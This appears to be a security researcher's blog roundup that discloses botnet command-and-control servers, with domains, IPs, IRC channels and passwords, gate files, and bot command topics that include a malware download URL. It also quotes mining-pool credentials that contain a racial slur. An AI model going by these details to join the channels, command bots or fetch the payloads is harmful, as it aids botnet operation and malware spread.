This was loaded from snk’s latest irc net. The bot is pretty strange, as it tries to connect to five unregistered domains before connecting to the ip. Here they are: amnsreiuojy.ru amnsreiuojy.in amnsreiuojy.biz amnsreiuojy.com amnsreiuojy.nl Server: 188.40.15.22 Gate file: /sg.php Plugin: http://188.40.15.22/uploads/is.s It appears to be some sort of Facebook spreader. hosting infos: http://whois.domaintools.com/188.40.15.22
srv5050.co (snk asper mod hosted by oneandone.net)
Resolved srv5050.co to 213.165.85.114, 212.227.141.241 snk is at it again Server: srv5050.co (alternate domains srv5050.su r83g9dhwuabce.net) Port: 5050 Channel: #u * Topic for #u is: .j #s .d x /100/97/111/124/49/59/47/127/124/127/58/78/114/123/105/113/116/105/108/116/46/115/121/97/48/55/55/18/43/58/44/121/85/110/127/122/107/127/30/111/81/* Topic for #u set by x at Tue Jan 29 13:46:37 2013 * Topic for #s is: .d x /100/97/111/124/49/59/47/127/124/127/58/78/114/123/105/113/116/105/108/116/46/115/121/97/48/55/96/78/112/58/117/124/16/60/118/97/101/119/21/104/74/* Topic for #s set byRead more...
webhostingprotection.info (Betabot http botnet hosted by Santrex.net)
Resolved webhostingprotection.info to 46.166.163.131 Server: webhostingprotection.info Gate file: /icool/order.php This was from the closed beta of the betabot http bot. The server files have been taken down now so not much point visiting the site. There wasn’t much to see except evidence of the coder’s man crush on the steely gaze of Brian Krebs. ForRead more...
xtremehosting.info, sexwithme.info (Athena irc botnet hosted by voxility.net)
Resolved xtremehosting.info, sexwithme.info to 37.221.170.221 Server: xtremehosting.info Port: 6667 Channel: #boss Channel password: mystical Topic for #boss is: !stop Topic for #boss set by samiam at Fri Jan 25 10:31:21 2013 Nick format: [U|WIN7|x64|L]txzrks Server: sexwithme.info Port: 6667 Channel: #210 Nick format: _[USA|U|L|WIN7|x32|4c]rflbxwws Current Local Users: 823 Max: 1585 #boss 243 [+sntVCTk] !stop #210 402 Read more...
irc.stressing.info (Multiple irc bots hosted by blacklotus.net)
Resolved irc.stressing.info, unknownkind.no-ip.org, 123456788.no-ip.info to 199.59.163.135 Aryan bot Server: irc.stressing.info Port: 6667 Current Global Users: 599 Max: 5456 Channel: #bonez #bonez 126 [+smntMu] @j #quiet Topic for #bonez is: @j #quiet Topic for #bonez set by Mixtape at Tue Jan 22 03:00:44 2013 Topic for #quiet is: @dl hxxp://jelly.stressing.info/swagbonez/bot.exe 1 Topic for #quiet set byRead more...
zeonyx.info (Andromeda http botnet hosted by voxility.net)
Resolved zeonyx.info to 37.221.170.240 Server: zeonyx.info Gate file: /Balls/Panel/Panel/image.php Some bitcoin mining infos: http://Slinky:abc123@pool.bitclockers.com:8332 http://Zeroexe7_Zero8:nigger1@eu.triplemining.com:8344 http://Zeroexe7_Indian:nigger1@us2.eclipsemc.com:8337 Hosting infos: http://whois.domaintools.com/37.221.170.240
index.myftp.org (Andromeda http botnet hosted by hostkey.com)
Note: Be careful if you visit this site, the index page redirects to a shitty java exploit. http://urlquery.net/report.php?id=814566 Resolved index.myftp.org to 141.105.67.83 Server: index.myftp.org Gate file: /andy/image.php Hosting infos: http://whois.domaintools.com/141.105.67.83
www.ultra-sales.com (Andromeda http botnet hosted by Vps6.net)
Resolved www.ultra-sales.com to 198.23.252.71 Server: www.ultra-sales.com Gate file: /an/image.php Updates and other malware hosted here: hxxp://www.ultra-sales.com/hosted/ Hosting infos: http://whois.domaintools.com/198.23.252.71
193.107.19.151 (Reverse proxy malware hosted by 2×4.ru)
Server: 193.107.19.151 Bot connect port: 8898 Web login port: 2567 Server config: http://193.107.19.151/config.cfg According to the errors on the index page, it’s hosted on a windows vps. Hosting infos: http://whois.domaintools.com/193.107.19.151
shellysdailylife.info (Insomnia irc botnet hosted by volumedrive.com)
Resolved shellysdailylife.info to 199.115.228.38 Server: shellysdailylife.info Port: 44 Channel: #Insomnia #Insomnia 341 [+sntu] This is the second time this IP has been posted. The previous time it was also hosting insomnia ircbots. Hosting infos: http://whois.domaintools.com/199.115.228.38